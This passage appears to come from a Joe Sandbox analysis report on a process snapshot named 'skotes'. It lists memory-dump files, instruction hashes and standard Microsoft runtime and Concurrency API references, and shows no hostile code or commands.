                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::details::_$TaskToken$Base::_CallbackCancellationCollectionCollection::_CountH_prolog3_catchRegisterStateState::_Structured
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2092016602-0
                                                                                                                                                                                                                                                                • Opcode ID: 1345b9225bb627a0a29aabfbc9eaaaf1470944de4804284706692cf3b501de25
                                                                                                                                                                                                                                                                • Instruction ID: 31033e16c27887c08bd3fc14da69c6a958451e045866ea95a3daed495382f2d6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1345b9225bb627a0a29aabfbc9eaaaf1470944de4804284706692cf3b501de25
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A31A7B5E00606AFCF04DFA8C5919EDF7B5BF48710B14822EE426A7791DB34AD41CB90
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 531285432-0
                                                                                                                                                                                                                                                                • Opcode ID: 3f3d47d3bac42b97159e28fa9f29c0b8602effc7a29ef3e920122b8b31dbe983
                                                                                                                                                                                                                                                                • Instruction ID: 48cce6c6ab347477317b4117cc9718f8ae9b94498b94c64f3afb553221a74d19
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f3d47d3bac42b97159e28fa9f29c0b8602effc7a29ef3e920122b8b31dbe983
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 59210C71A00219AFDF00EFA4D995DFEBBB9EF09720F104069F501A7262DB609D019BA0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __EH_prolog3_catch.LIBCMT ref: 00AC9C9C
                                                                                                                                                                                                                                                                • Concurrency::SchedulerPolicy::_ValidPolicyValue.LIBCONCRT ref: 00AC9CE8
                                                                                                                                                                                                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 00AC9CFE
                                                                                                                                                                                                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 00AC9D6A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: std::bad_exception::bad_exception$Concurrency::H_prolog3_catchPolicyPolicy::_SchedulerValidValue
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2033596534-0
                                                                                                                                                                                                                                                                • Opcode ID: 4e795fbe6c6f54b3765949ba96da20abf760b8e204f27ffeed6af30e2e8ff6b6
                                                                                                                                                                                                                                                                • Instruction ID: c9d78141c99f990f358d9c605803d21b46fb13f434b04294f441e3fc5c117ac9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4e795fbe6c6f54b3765949ba96da20abf760b8e204f27ffeed6af30e2e8ff6b6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 83218676904619EFDB05EFA4D68AEAEB7B4BF05710B22406DF102BB252EB316D01CB51
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 00ACA069
                                                                                                                                                                                                                                                                  • Part of subcall function 00ACB560: Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCONCRT ref: 00ACB5AF
                                                                                                                                                                                                                                                                • Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 00ACA07F
                                                                                                                                                                                                                                                                • Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 00ACA0CB
                                                                                                                                                                                                                                                                  • Part of subcall function 00ACAB41: List.LIBCONCRT ref: 00ACAB77
                                                                                                                                                                                                                                                                • Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 00ACA0DB
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::details::$Proxy::Scheduler$ExecutionHardware$AffinityAffinity::BorrowedCoreCountCurrentFixedIncrementListResourceResource::StateToggle
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 932774601-0
                                                                                                                                                                                                                                                                • Opcode ID: 4c3806840d25fe4ff28789b5a5f279a8046edee6f10f32d745c1147dfed1f9c8
                                                                                                                                                                                                                                                                • Instruction ID: 6a774f099cc7d444e017764c3a64f1c4076550f3ef0f97f42cbbffadb331b465
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4c3806840d25fe4ff28789b5a5f279a8046edee6f10f32d745c1147dfed1f9c8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FF219C31900A189FCB24EF65DA91DBBB3F5FF58304701455EE443A7651DB30A905CBA2
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • ListArray.LIBCONCRT ref: 00AC4893
                                                                                                                                                                                                                                                                • ListArray.LIBCONCRT ref: 00AC48A5
                                                                                                                                                                                                                                                                  • Part of subcall function 00AC5555: _InternalDeleteHelper.LIBCONCRT ref: 00AC5564
                                                                                                                                                                                                                                                                • ListArray.LIBCONCRT ref: 00AC48AF
                                                                                                                                                                                                                                                                • _InternalDeleteHelper.LIBCONCRT ref: 00AC48C8
                                                                                                                                                                                                                                                                Memory Dump Source
